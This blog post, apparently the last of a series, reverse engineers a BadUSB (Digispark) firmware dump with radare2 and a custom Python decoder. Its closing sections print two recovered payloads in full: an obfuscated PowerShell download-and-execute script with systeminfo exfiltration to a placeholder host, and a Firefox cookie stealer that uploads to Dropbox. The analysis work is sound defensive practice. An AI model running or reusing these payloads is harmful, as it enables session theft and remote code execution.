Introduction
This post is the continuation of How to safely investigate an unknown and potentially malicious USB device [1/3] and From sadusb to badusb. Building an internal SOC exercise [2/3].
After the initial failed attempt at reversing a memory dump, let’s assume I found a malicious USB stick in the parking lot. This time, however, the payload isn’t unknown; is the one that I crafted myself and explained in the previous post.
Now that we have a real malicious badusb, we can finally analyze it.
Yes, I know it’s cheating, but I don’t care.
Why spend more time on this if I already know what’s inside the stick? Because, why not?
Memory dump
There are many questions on Stack Overflow about whether it’s possible to extract code from an Arduino board or an AVR microcontroller. Since many Arduino boards are based on ATmega microcontrollers, it’s understandable that beginners often run into issues and ask these questions. So, looks like it’s common to flash something and then lose the source code ¯\(ツ)/¯
One of my favorite answers to the question How do I extract code from an arduino? [duplicate] is:
The short answer: You don’t.
With enough know-how, you could probably extract the executable binary from the Arduino, but the source code is not installed on the device. You would need to run a decompiler on the binary. (Or read the machine code directly.) The output of a decompiler is usually pretty ugly however, and will look quite different from the original source-code. It won’t have meaningful variable names, class names, or function names, and the code structure will likely be a little different than the original source code.
All those problems, setbacks, and attempts to demotivate are exactly what I’m looking for :D
But, as we already know, there are different ways to dump memory from the ATtiny. I will use the Arduino as ISP because it’s easier and more reliable. Everything is explained here: Dumping memory, Second attempt: Arduino
Not much more to add here, just clip the chip and fire avrdude.
$ sudo avrdude -v -c avrisp -p t85 -P /dev/ttyACM0 -b 19200 -U flash:r:dump.bin
Inspecting the memory dump
Once we have the memory dump file, we can inspect its contents.
$ xxd dump.bin
00000000: 48c3 6cc3 9ac6 6ac3 22c6 68c3 67c3 66c3 H.l...j.".h.g.f.
00000010: 65c3 64c3 63c3 62c3 61c3 60c3 5fc3 2c5e e.d.c.b.a.`._.,^
00000020: 7460 6162 6434 6667 656e 362d 3738 271e t`abd4fgen6-78'.
00000030: 1f20 2122 2324 2526 7333 762e 7778 5f44 . !"#$%&s3v.wx_D
00000040: 4546 4748 494a 4b4c 4d4e 4f50 5152 5354 EFGHIJKLMNOPQRST
00000050: 5556 5758 595a 5b5c 5d2f 3130 636d 3504 UVWXYZ[\]/10cm5.
00000060: 0506 0708 090a 0b0c 0d0e 0f10 1112 1314 ................
00000070: 1516 1718 191a 1b1c 1d6f 7170 752a 0501 .........oqpu*..
00000080: 0906 a101 0507 19e0 29e7 1500 2501 7501 ........)...%.u.
00000090: 9508 8102 9501 7508 2573 1900 2973 8100 ......u.%s..)s..
000000a0: c012 034b 0065 0079 0062 006f 0061 0072 ...K.e.y.b.o.a.r
000000b0: 0064 0028 0344 0065 006c 006c 0020 0043 .d.(.D.e.l.l. .C
000000c0: 006f 006d 0070 0075 0074 0065 0072 0020 .o.m.p.u.t.e.r.
000000d0: 0043 006f 0072 0070 002e 0004 0309 0409 .C.o.r.p........
000000e0: 0222 0001 0100 8032 0904 0000 0103 0101 .".....2........ ...
This time, we have some interesting data! The keyboard name is easily identifiable at the start of the binary, looks so promising!
It’s the only thing that makes sense, but it’s normal, it’s a memory dump.
Running the strings
command doesn’t show anything useful:
$ strings dump.bin
,^t`abd4fgen6-78'
!"#$%&s3v.wx_DEFGHIJKLMNOPQRSTUVWXYZ[\]/10cm5
oqpu*
h>s@
/_?O$
&/ R3
M/l/
F/h/
q@d/w
q/wRP ~@/G~T
If the payload contents were shown directly using strings
, it would have been too easy.
To get more information, we’ll need to use a disassembler to recover the assembly code.
Dissassembly
A disassembler is a computer program that translates machine language into assembly language.
avr-objdump
is a utility that is part of the AVR-GCC toolset, used for developing software for AVR microcontrollers. It is a version of the GNU objdump
program tailored specifically for the AVR architecture.
The input file should be in Intel Hex format. To convert from binary to ihex or vice-versa, we can use the avr-objcopy
utility.
avr-objcopy -I ihex dump.hex -O binary dump.bin avr-objcopy -I binary dump.bin -O ihex dump.hex
Some useful options of the avr-objdump
include:
-x, --all-headers Display the contents of all headers
-d, --disassemble Display assembler contents of executable sections
-D, --disassemble-all Display assembler contents of all sections
-S, --source Intermix source code with disassembly
-s, --full-contents Display the full contents of all sections requested -m, --architecture=MACHINE Specify the target architecture as MACHINE
The MACHINE architecture can be found on nongnu.org. For the ATtiny85, it corresponds to avr2/avr25
.
Using these utilities, we can get the disassembly, though it’s a bit rudimentary.
$ avr-objcopy -I binary dump.bin -O ihex dump.hex
$ avr-objdump -m avr25 -xD dump.hex
dump.hex: file format ihex
dump.hex
architecture: UNKNOWN!, flags 0x00000000:
start address 0x00000000
Sections:
Idx Name Size VMA LMA File off Algn
0 .sec1 000011aa 00000000 00000000 00000000 2**0
CONTENTS, ALLOC, LOAD
SYMBOL TABLE:
no symbols
Disassembly of section .sec1:
00000000 <.sec1>:
0: 48 c3 rjmp .+1680 ; 0x692
2: 6c c3 rjmp .+1752 ; 0x6dc
4: 9a c6 rjmp .+3380 ; 0xd3a
6: 6a c3 rjmp .+1748 ; 0x6dc
8: 22 c6 rjmp .+3140 ; 0xc4e
a: 68 c3 rjmp .+1744 ; 0x6dc
c: 67 c3 rjmp .+1742 ; 0x6dc
e: 66 c3 rjmp .+1740 ; 0x6dc
10: 65 c3 rjmp .+1738 ; 0x6dc
12: 64 c3 rjmp .+1736 ; 0x6dc
14: 63 c3 rjmp .+1734 ; 0x6dc
16: 62 c3 rjmp .+1732 ; 0x6dc
18: 61 c3 rjmp .+1730 ; 0x6dc
1a: 60 c3 rjmp .+1728 ; 0x6dc
1c: 5f c3 rjmp .+1726 ; 0x6dc
1e: 2c 5e subi r18, 0xEC ; 236
20: 74 60 ori r23, 0x04 ; 4
22: 61 62 ori r22, 0x21 ; 33
24: 64 34 cpi r22, 0x44 ; 68
26: 66 67 ori r22, 0x76 ; 118
28: 65 6e ori r22, 0xE5 ; 229
2a: 36 2d mov r19, r6
2c: 37 38 cpi r19, 0x87 ; 135
2e: 27 1e adc r2, r23
30: 1f 20 and r1, r15
32: 21 22 and r2, r17 ...
avr-objdump
is simple and easy to use, but it’s not the best tool for reverse engineering a full firmware.
There are other similar alternatives like vAVRdisasm, AVRDisassembler, or avrdisas, but they are a bit old and have basic features too.
Other advanced disassembler and decompiler alternatives that support AVR include Ghidra, IDA Pro, Binary Ninja, and Hopper. However, radare2 is my favorite <3
Learning AVR
Now that we have a memory dump and we can read assembly code, it’s time to learn a bit more about AVR Assembly to understand what is going on.
Introduction to AVR assembly
AVR assembly language is a low-level language specific to the AVR family of microcontrollers. Understanding AVR assembly requires familiarity with its instruction set and architecture.
Here are some basics to get started:
Memory: The memory in AVR microcontrollers includes Flash memory for storing the program, SRAM for data, and EEPROM for non-volatile data storage. More information about the memory map can be found in a previous blog post.
Registers: AVR microcontrollers have 32 general-purpose working registers, named R0 to R31. Additionally, there are special-purpose double registers like X (R26,R27), Y (R28,R29), and Z (R30,R31), which are used for memory addressing operations.
Useful resources
AVR® Instruction Set Manual: The AVR® Instruction Set Manual from Microchip is the official document detailing each instruction. However, it can be dense and challenging to read straight through. It’s useful for looking up specific instructions or clarifying doubts.
Hackaday Course: The AVR: Architecture, Assembly & Reverse Engineering course by Uri Shaked and Hackaday is extremely useful to understand low level AVR. It’s a full course covering very interesting topics about AVR and practical reverse engineering techniques.
Understanding instructions
Learning common instructions is crucial for understanding AVR assembly. Here are a couple examples of how instructions are documented in the datasheet:
- LDI (Load Immediate): Loads an 8-bit constant directly to a register.
- OUT (Output): Transfers data from a register to an I/O location.
By familiarizing ourselves with these instructions and registers, we can begin to piece together what the assembly code is doing.
Understanding AVR assembly takes time and practice. My approach was to dive straight into the assembly code and refer to the documentation as needed. Over time, you’ll start to recognize and understand more parts of the code.
Reversing with radare2
Entrypoint and bootloaders
After the initial analysis with aaa
, we can find basic information about the memory dump:
The entrypoint is detected at 0x00692
The keyboard type is easily found by searching for strings, but the full payload is encoded inside the binary data.
Looking at the graph of the entrypoint function, we can see a more or less familiar structure.
The LiveOverflow video Identify Bootloader main() and find Button Press Handler - Hardware Wallet Research #5 is an excellent resource showing a similar initialization routine.
It’s practically the same RAM initialization routine, or bootloader initialization:
- Copy static data from ROM to RAM
- RAM is empty on startup
- Clear the rest of RAM
- Call the
main()
function
We flashed our code directly using avrdude
without specifying the bootloader, and a minimal initialization is what we see at the entry0
.
Following the graph, we can find the main function (renamed by me):
Main function
The main function is quite large and can be summarized into two different parts.
First part
The first part is a hardware initialization, using I/O registers. Radare2 helps a lot with annotations.
I/O registers in AVR are special memory locations used to control hardware peripherals like timers, counters, serial ports, and other internal components. Each I/O register is associated with a specific function or hardware feature.
There are a lot of in
, out
, andi
, and ori
instructions, used to configure these registers.
in
: Load an I/O Location to Register. Loads data from the I/O Space (Ports, Timers, Configuration Registers, etc.) into register Rd in the Register File.out
: Store Register to I/O Location. Stores data from register Rr in the Register File to I/O Space (Ports, Timers, Configuration Registers, etc.).andi
: Logical AND with Immediate. Performs the logical AND between the contents of register Rd and a constant, and places the result in the destination register Rd.ori
: Logical OR with Immediate. Performs the logical OR between the contents of register Rd and a constant, and places the result in the destination register Rd.
Second part
The second part of the main function contains the actual code that calls a lot of different functions, and also runs inside a loop.
By comparing the main function from the disassembly with the source code, and renaming some functions for clarity, we can see a clear correlation between them.
We can also verify that the arguments match between the assembly and the source code.
For example, the digi.delay
function arguments can be compared:
delay(5000)
in the source code is confirmed by the assembly:
0x00000f7c]> ? 0x88~bin
[0b10001000
binary 0x00000f7c]> ? 0x13~bin
[0b00010011
binary 0x00000f7c]> ? 0b0001001110001000~int
[5000 int32
Similarly, delay(1000)
is confirmed as well:
0x00000f7c]> ? 0xe8~bin
[0b11101000
binary 0x00000f7c]> ? 0x03~bin
[0b00000011
binary 0x00000f7c]> ? 0b0000001111101000~int
[1000 int32
The arguments for the sendKeyStroke()
functions also match:
0x00000f7c]> ? 0x15~int
[21
int32 0x00000f7c]> ? 0x08~int
[8 int32
.sendKeyStroke(21, 8); // GUI R DigiKeyboard
The duckyString()
function has two arguments: the pointer to the encoded keys and the length.
(key_cmd, sizeof(key_cmd)); // STRING cmd /k duckyString
The disassembly shows the two arguments (r22+r23 and r24+r25):
We can validate that the size is 12 and the contents are at address *0x675
.
>>> 0x0c
12
>>> f'0x{0x06:x}{0x75:x}'
'0x675'
Examining 12 bytes starting at this memory address in radare:
And the original values in the source code were:
// cmd /k
const uint8_t key_cmd[] PROGMEM = {0,6, 0,16, 0,7, 0,44, 0,56, 0,14};
Everything is starting to make sense!
At this point, we have identified the initialization routine or bootloader, the main loop function, and all the important functions and arguments at a high level. We have also learned that the payload to be injected is somewhere in memory and can be found, read, and decoded.
Let’s continue our reversing process to retrieve all the decoded values.
Decode payload bytes
In my exercise I used the BadUSB converter tool duckify.huhn.me to build the sketches with my ducky script payloads. This webapp tool is based on the code from duckify. By examining the source code, I found that it relies on various mappings and JSON files containing the values for each character corresponding to different languages and operating systems.
To reverse-engineer the values, the idea was to guess the keyboard language and operating system, and then refer to the relevant json file for the corresponding values.
However, it was a bit more complicated than anticipated.
Reviewing the duckify’s source code
The possible key mappings are defined in json files within a library
folder. The conversion of these mappings is handled in arduinoConverter.js.
The conversion works by reading lines of the Ducky Script and processing them based on the verb (REM
, STRING
, DELAY
, etc.). The STRING
verbs, which contain the payloads to be automatically injected, are particularly interesting. The main code that handles STRING
lines is:
...
// STRING
else if (line.startsWith('STRING ')) {
const i = keyArrays.length
const value = line.substring(7)
const comment = commentEscape(value)
const shortComment = commentCut(value)
addCodeLine(`duckyString(key_arr_${i}, sizeof(key_arr_${i})); // STRING ${shortComment}`)
.push({
keyArrayscomment: comment,
value: encodeString(value, layout, i),
})
}...
The function that encodes the line is as follows:
encodeString(value, layout, i)
The layout used for encoding is one of the options listed here:
import win_be from './win/be.json'
import win_bg from './win/bg.json'
import win_cacms from './win/ca-cms.json'
import win_cafr from './win/ca-fr.json'
import win_chde from './win/ch-de.json'
...
Each layout is a json file with entries like this:
{
"char": "a",
"code": "KeyA",
"alt": false,
"altGr": false,
"shift": false,
"us": "a",
"combo": "",
"comboAlt": false,
"comboAltGr": false,
"comboShift": false
}
The encodeString
function processes each character of the line and encodes it using the following logic:
for (const char of str) {
const key = layout.find(key => key.char === char)
const value = getKeyValue(key ? key.us : char)
const modValue = key ? getModValue(key) : 0x00
if (value === 0) {
console.log(`Couldn't find value for ${char}`, key)
}
if (key && key.combo !== '') {
const comboModValue = getComboModValue(key)
const comboValue = getKeyValue(key.combo)
+= `${comboModValue.toString()},${comboValue.toString()}, `
output
}
+= `${modValue.toString()},${value.toString()}, `
output }
- Find the Key in the layout json file.
const key = layout.find(key => key.char === char)
- Get the Key Value using
charMap
, A map giving a value to the key.
const value = getKeyValue(key ? key.us : char)
Ternary operator: (condition) ? "value if True" : "value if False"
const getKeyValue = (key) => {
return charMap[key] | 0x00
}
const charMap = {
'a': 0x04,
'b': 0x05,
'c': 0x06,
...
'1': 0x1e,
'2': 0x1f,
...
' ': 0x2c,
'-': 0x2d,
'=': 0x2e,
...
// Extras
'\n': 0x28, // ENTER
'Space': 0x2c, // SPACE
...
}
- Get modValue, special key combinations.
const getModValue = (key) => {
let value = 0x00
if (key.shift) value |= modMap['LSHIFT']
if (key.alt) value |= modMap['LALT']
if (key.altGr) value |= modMap['RALT']
return value
}
If any of the key attributes is present, it does a bitwise OR (|=
) against value
using the modMap
mapping with the following values:
const modMap = {
'LSHIFT': 0x02,
'LALT': 0x04,
'RALT': 0x40,
...
}
It essentially is bit masking the mod options in a single byte.
- Process Combos, multiple keys pressed.
At this point we already have the key and keymod, but some chars are encoded using more than one key pressed, and are defined as combos.
If we found a valid value, and the key contains a valid key.combo
, we continue to get the comboModValue
the same way as before, as well as the comboValue
:
const comboModValue = getComboModValue(key)
const comboValue = getKeyValue(key.combo)
const getComboModValue = (key) => {
let value = 0x00
if (key.comboAlt) value |= modMap['LALT']
if (key.comboAltGr) value |= modMap['RALT']
if (key.comboShift) value |= modMap['LSHIFT']
return value
}
- Add key results to Output
+= `${comboModValue.toString()},${comboValue.toString()}, `
output ...
+= `${modValue.toString()},${value.toString()}, ` output
For example, encoding the character “à” with the es
layout might result in:
{0,47, 0,4}
But that is not a possible value using the us
layout and will be represented as:
{0,0}
The key.combo
and key.char
values could overlap, making it challenging to distinguish between comboModValue
/comboValue
and modValue
/value
.
Decoding the values by manually inspecting the mappings is complex. Therefore, automating the process is a practical solution. It’s nice to find an excuse for spending some time automating stuff.
Automating the decoding process
Each key pressed is represented by a pair of values because some characters require multiple special keys to be pressed simultaneously. For instance, a capital A
is sent using the combination SHIFT
+ a
.
If a character needs another key pressed first, it becomes a combo combination, resulting in two pairs of values (for example à
is equal to `
+ a
in some layouts).
To automate the decoding process, I wrote a Python script.
First, let’s define a class representing the key with all possible attributes:
class Key:
def __init__(self) -> None:
self.key_mod = 0
self.key_mod_values = []
self.key = 0
self.key_values = []
self.char = ""
self.alt = False
self.altGr = False
self.shift = False
self.us = ""
self.combo = ""
self.comboAlt = False
self.comboAltGr = False
self.comboShift = False
For testing, we will use the following values:
= b"\x00\x06\x00\x10\x00\x07\x00\x2c\x00\x38\x00\x0e" line
Before starting the decoding, we need to guess the layout and system. The best way to use the same values as the encoding process is to copy the full library
folder and search from there:
def get_possible_layouts():
= set()
possible_layouts for _, _, file_names in os.walk(Path(__file__).parent.resolve().joinpath("library")):
for file_name in file_names:
if file_name.endswith(".json"):
".")[0])
possible_layouts.add(file_name.split(return list(possible_layouts)
def load_layout(system, layout):
try:
with open(Path(__file__).parent.resolve().joinpath(f"library/{system}/{layout}.json")) as f:
return json.load(f)
except Exception:
"Error loading layout")
logging.exception( exit()
The main function iterates through the characters of the string and encodes them one by one.
The basic reverse process is to check if the char is a combo and then try to load the next char to verify if it’s valid or not. If not, it will try to reverse a normal key. If something goes wrong, will ignore it and just continue with the next one.
def extract_string(line, layout):
= ""
decoded = 0
offset for i in range(0, len(line), 1):
+= offset
i try:
= reverse_combo(line[i], line[i+1], layout)
_combo_key except IndexError:
continue
if _combo_key:
# check if next key can be combo-ed
try:
= reverse_combo_key(line[i+2], line[i+3], layout, _combo_key)
_k if _k:
# combo key sucess
logging.debug(_k)+= _k.char
decoded += 3
offset continue
except IndexError:
continue
try:
= reverse_key(line[i], line[i+1], layout)
_k except IndexError:
continue
if _k == False:
continue
logging.debug(_k)+= _k.char
decoded += 1
offset logging.info(decoded)
The reverse_combo
, reverse_combo_key
, and reverse_key
functions are very similar, and decode pairs of values. The layout
argument is the loaded json file with all the keys.
def reverse_key(key_mod, key, layout) -> Key:
# assume no previous combo key was found
= Key()
_k = key_mod
_k.key_mod = key
_k.key = [k for k, v in maps.charMap.items() if v == _k.key]
_k.key_values if len(_k.key_values) == 1:
= _k.key_values[0]
_k.us = [k for k, v in maps.modMap.items() if v == (_k.key_mod & v)]
_k.key_mod_values
_k.reverse_key_mod()= list(
possible_char filter(
lambda x: all(
["us"] == _k.us,
x["shift"] == _k.shift,
x["alt"] == _k.alt,
x["altGr"] == _k.altGr,
x["combo"] == _k.combo,
x["comboShift"] == _k.comboShift,
x["comboAlt"] == _k.comboAlt,
x["comboAltGr"] == _k.comboAltGr,
x[
]
),"keys", []),
layout.get(
)
)if len(possible_char) == 1:
= possible_char[0].get("char")
_k.char f"key found! \n{_k}")
logging.debug(return _k
elif len(possible_char) > 1:
f"Multiple char found for this key! {possible_char}")
logging.warning(
logging.warning(_k)return False
else:
return False
elif len(_k.key_values) > 1:
# edge case: space value is duplicated in charMap
if " " in _k.key_values and "Space" in _k.key_values:
# ignore key_mod
= " "
_k.char = " "
_k.us return _k
else:
return False
else:
return False
To reverse the process of the encoding, we need to inverse the bitwise OR. I wrote some small methods in the Key object to retrieve the information by just using _k.reverse_key_mod()
.
def reverse_key_mod(self) -> None:
if "LSHIFT" in self.key_mod_values:
self.shift = True
if "LALT" in self.key_mod_values:
self.alt = True
if "RALT" in self.key_mod_values:
self.altGr = True
def reverse_key_mod_combo(self) -> None:
if "LSHIFT" in self.key_mod_values:
self.comboShift = True
if "LALT" in self.key_mod_values:
self.comboAlt = True
if "RALT" in self.key_mod_values:
self.comboAltGr = True
With all that information gathered from the mapping, the final step is to filter the chosen layout for a key that matches all those properties.
A special case is the space key (0x2c
) because is the only duplicated value in the charMap. If the length of _k.key_values
is greater than 1, a space is assumed.
We can now test the script with our sample string (line = b"\x00\x06\x00\x10\x00\x07\x00\x2c\x00\x38\x00\x0e"
):
$ python3 test_unduckify.py --layout us --system win INFO: cmd /k
The simple test works well :)
Automating the extraction with r2pipe
Now that we have a working prototype for decoding the payload, we can use it to analyze a memory dump programmatically with r2pipe
. This tool allows us to interact with radare2 directly from the Python script.
The first step is to load the binary and analyze it. We also get the binary size and a list of all the detected functions.
# load binary
= Path(__file__).parent.resolve().joinpath(args.file)
binary_file try:
= r2pipe.open(str(binary_file))
r except Exception:
exit()else:
f"Binary loaded: {str(binary_file)}")
logging.info(
# analyze binary: get binary size and functions
"aaa")
r.cmdj(= r.cmdj("ij").get("core", {}).get("size")
binary_size = r.cmdj("aflj") functions
We need the binary_size to iterate over the memory dump byte by byte.
If radare2 has detected a function at a certain location, we can ignore that section of the memory as it doesn’t contain the data we are looking for.
...for i in range(0, binary_size, 1):
...# ignore memory that is part of a function
for f in functions:
if f.get("offset") <= i < f.get("offset") + f.get("realsz"):
break
...
At this point, we already have the basic structure of the program. The only remaining task is reading the bytes from the binary. Using the following command, we can read (in json format) 4 bytes at the current offset in our iteration. We need two pairs of values to check if there is a combo key.
= r.cmdj(f"pxj 4 @ {i}") ex
The final part of the script uses the same functions explained before to reverse the bytes (reverse_combo
, reverse_combo_key
, and reverse_key
).
As we iterate over a large binary without knowing its contents, it’s normal to encounter a lot of irrelevant or junk bytes. If any error occur, we simply ignore the byte and continue.
Packaging and time of truth
The script has grown considerably, and I decided to build it into a package.
It’s called unduckify and the source code can be found here
Usage:
$ unduckify --help
usage: unduckify [-h] (-f FILE | -t TEST) [-l {si,es-la,be,ie,ca-cms,gb,no,sk,ch-fr,bg,is,lt,cz,ca-fr,pt-br,ua,ro,tr,nl,hu,us,ru,ch-de,se,es,it,fi,fr,in,lv,ee,de,pl,dk,gr,hr,pt}]
[-s {win,mac}] [-v]
options:
-h, --help show this help message and exit
-f FILE, --file FILE
-t TEST, --test TEST Provide a value list to test. Example: "0,6, 0,16, 0,7, 0,44, 2,36, 0,14"
-l {si,es-la,be,ie,ca-cms,gb,no,sk,ch-fr,bg,is,lt,cz,ca-fr,pt-br,ua,ro,tr,nl,hu,us,ru,ch-de,se,es,it,fi,fr,in,lv,ee,de,pl,dk,gr,hr,pt}, --layout {si,es-la,be,ie,ca-cms,gb,no,sk,ch-fr,bg,is,lt,cz,ca-fr,pt-br,ua,ro,tr,nl,hu,us,ru,ch-de,se,es,it,fi,fr,in,lv,ee,de,pl,dk,gr,hr,pt}
-s {win,mac}, --system {win,mac} -v, --verbose
Example using test values:
$ unduckify -t "0,6, 0,16, 0,7, 0,44, 2,36, 0,14" -l es -s win -v
DEBUG: args.file=None
DEBUG: args.test='0,6, 0,16, 0,7, 0,44, 2,36, 0,14'
DEBUG: args.layout='es'
DEBUG: args.system='win'
DEBUG: args.verbose=True
INFO: Values to test: [0, 6, 0, 16, 0, 7, 0, 44, 2, 36, 0, 14]
DEBUG: key found!
DEBUG: (0,6) us='c', char='c', key_mod_values=[], key_values=['c'], alt=False, altGr=False, shift=False, combo='', comboAlt=False, comboAltGr=False, comboShift=False
DEBUG: key found!
DEBUG: (0,16) us='m', char='m', key_mod_values=[], key_values=['m'], alt=False, altGr=False, shift=False, combo='', comboAlt=False, comboAltGr=False, comboShift=False
DEBUG: key found!
DEBUG: (0,7) us='d', char='d', key_mod_values=[], key_values=['d'], alt=False, altGr=False, shift=False, combo='', comboAlt=False, comboAltGr=False, comboShift=False
DEBUG: space found!
DEBUG: (0,44) us=' ', char=' ', key_mod_values=[], key_values=[' ', 'Space'], alt=False, altGr=False, shift=False, combo='', comboAlt=False, comboAltGr=False, comboShift=False
DEBUG: key found!
DEBUG: (2,36) us='7', char='/', key_mod_values=['SHIFT', 'LSHIFT'], key_values=['7'], alt=False, altGr=False, shift=True, combo='', comboAlt=False, comboAltGr=False, comboShift=False
DEBUG: key found!
DEBUG: (0,14) us='k', char='k', key_mod_values=[], key_values=['k'], alt=False, altGr=False, shift=False, combo='', comboAlt=False, comboAltGr=False, comboShift=False INFO: cmd /k
Example using a memory dump:
$ unduckify -f dump.bin -l us -s win
INFO: Binary loaded: /.../dump.bin
INFO: Analyze all flags starting with sym. and entry0 (aa)
INFO: Analyze imports (af@@@i)
INFO: Analyze entrypoint (af@ entry0)
INFO: Analyze symbols (af@@@s)
INFO: Recovering variables
INFO: Analyze all functions arguments/locals (afva@@@F)
INFO: Analyze function calls (aac)
INFO: find and analyze function preludes (aap)
INFO: Analyze len bytes of instructions for references (aar)
INFO: Finding and parsing C++ vtables (avrr)
INFO: Analyzing methods
INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav)
WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0
INFO: Emulate functions to find computed references (aaef)
INFO: Recovering local variables (afva)
INFO: Type matching analysis for all functions (aaft)
INFO: Propagate noreturn information (aanr)
INFO: Use -AA or aaaa to perform additional experimental analysis
INFO: binary_size=4522
INFO: len(functions)=14
INFO: extracted data: 04^]fHnPvXBfb8833=aF%Ff5dEgme3.$h=iwr -me o -useR('')-uR('{3}{1}{4}{0}{2}'-f'dom','tps://','ain/','ht','my.')|select H*;$h=$h.headers['x-'+[char]99+'tf'];$k=([byte]91,170,97,228,201,185,63,63,6,130,37,11,108,248,51,27,126,230,143,216);iex([System.Text.Encoding]::UTF8.GetString((0..([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h)).Length-1)|ForEach-Object{([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h))[$_] -bxor $k[$_ % $k.Length])})))powershell -ver 5 -nol -nop -ep bypassexitpowershell -nol -nop -ep bypass -c "Invoke-WebRequest -UserAgent '' -Uri http://my.domain/$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($(systeminfo)))) | out-null"cmd /k/Ame7Dj<dn [zz{[[0zz22eL@fl22le0eL@ |]mnt[m][)6| 3vmn 6ftc2lemn3f]}}n]}]]}}f[[[y e@s!b2lL@Hf2leFnL@\xh2leLLN]6LLzzzz[ll2uzz[[)E000HFDB@#CE[U{{0n 0 CE0 U0 0"vnP,N2l[u5n3mx0]''eW@UET))ynNmTT.76 OQ{m
The extracted data contains a lot of garbage, but hidden within it is my payload! The payload is exactly the same but appears as a continuous string. Looking at this output makes it relatively easy to deduce what the badUSB is doing.
If we separate the lines, the payload becomes much clearer:
$h=iwr -me o -useR('')-uR('{3}{1}{4}{0}{2}'-f'dom','tps://','ain/','ht','my.')|select H*;
$h=$h.headers['x-'+[char]99+'tf'];
$k=([byte]91,170,97,228,201,185,63,63,6,130,37,11,108,248,51,27,126,230,143,216);
iex([System.Text.Encoding]::UTF8.GetString((0..([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h)).Length-1)|ForEach-Object{([System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($h))[$_] -bxor $k[$_ % $k.Length])})))
-ver 5 -nol -nop -ep bypass
powershell exit
-nol -nop -ep bypass -c "Invoke-WebRequest -UserAgent '' -Uri http://my.domain/$([Convert]::ToBase64String([Text.Encoding]::UTF8.GetBytes($(systeminfo)))) | out-null"
powershell /k cmd
But since I already knew what was there, could we test it with another payload? Sure, let’s try it!
Reverse other random payloads from the Internet
There are a lot of resources with sample payloads, examples, or pranks for the Digispark BadUSB or the Rubber Ducky available on the internet. The majority of these payloads are in DuckyScript format. Some example repositories include:
I found a random payload and flashed it into the Digispark, but I don’t remember where I got it from. Let’s see if I can recover the payload using my unduckify
tool:
$ unduckify -l us -s win -f ../dumps/digispark.bin
INFO: Binary loaded: /.../dumps/digispark.bin
INFO: Analyze all flags starting with sym. and entry0 (aa)
INFO: Analyze imports (af@@@i)
INFO: Analyze entrypoint (af@ entry0)
INFO: Analyze symbols (af@@@s)
INFO: Recovering variables
INFO: Analyze all functions arguments/locals (afva@@@F)
INFO: Analyze function calls (aac)
INFO: find and analyze function preludes (aap)
INFO: Analyze len bytes of instructions for references (aar)
INFO: Finding and parsing C++ vtables (avrr)
INFO: Analyzing methods
INFO: Finding xrefs in noncode sections (e anal.in=io.maps.x; aav)
WARN: Skipping aav because base address is zero. Use -B 0x800000 or aav0
INFO: Emulate functions to find computed references (aaef)
INFO: Recovering local variables (afva)
INFO: Type matching analysis for all functions (aaft)
INFO: Propagate noreturn information (aanr)
INFO: Use -AA or aaaa to perform additional experimental analysis
INFO: binary_size=4430
INFO: len(functions)=12
INFO: extracted data: 04^]fHnPvXBfb8833=aF%Ff5dEgme3.Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath; exit;$headers.Add("Content-Type", "application/octet-stream")$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')$headers.Add("Authorization", "Bearer $accessToken")$headers = @{}$dropboxFilePath = "/cookies_exported.sqlite"$uploadUrl = "https://content.dropboxapi.com/2/files/upload" $accessToken = "DROPBOX_ACCESS_TOKEN"$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'powershell/AmnDj<dn L@fl22le0eL@ |]mnt[m][)6| 3vmn 6ftc2lemn3f]}}n]}]]}}f[[[y e@s!b2lL@Hf2leFnL@\xh2leLLN]6LLzzzz[ll2uzz[[)E000HFDB@#CE[U{{0n 0 CE0 U0 0"vnP,N2l[u5n3mx0]''eW@UET))ynNmTT.OQ{mB
Let’s analyze the extracted data after cleaning it up:
powershell$firefoxProfilePath = Join-Path -Path $env:APPDATA -ChildPath 'Mozilla\Firefox\Profiles'
$firefoxProfile = Get-ChildItem -Path $firefoxProfilePath | Where-Object {$_.Name -like "*default-release"}
$filePath = Join-Path -Path $firefoxProfile.FullName -ChildPath 'cookies.sqlite'
$uploadUrl = "https://content.dropboxapi.com/2/files/upload"
$dropboxFilePath = "/cookies_exported.sqlite"
$accessToken = "DROPBOX_ACCESS_TOKEN"
$headers = @{}
$headers.Add("Content-Type", "application/octet-stream")
$headers.Add("Dropbox-API-Arg", '{"path":"' + $dropboxFilePath + '","mode":"add","autorename":true,"mute":false}')
$headers.Add("Authorization", "Bearer $accessToken")
Invoke-RestMethod -Uri $uploadUrl -Headers $headers -Method Post -Body $filePath;
exit;
It is clearly a Firefox exfiltration using powershell. It searches for the cookies.sqlite
database and uploads it to Dropbox using a custom ACCESS_TOKEN
.
The unduckify
tool works really well; it’s plug-and-play once you have the memory dump (but has to be flashed using Duckify). This allows for efficient extraction and analysis of payloads, even if the original source is forgotten or unavailable.
Conclusions
We have successfully analyzed a USB device without plugging it into the computer. This project spanned several months, and I am satisfied with the final results and all the knowledge gained.
I’m happy to have finally solved a problem I had looked up myself. I can continue with my life now.
I also really loved automating everything and playing with radare2 <3
And remember, if you ever find a USB stick in the parking lot, don’t plug it in, reverse it!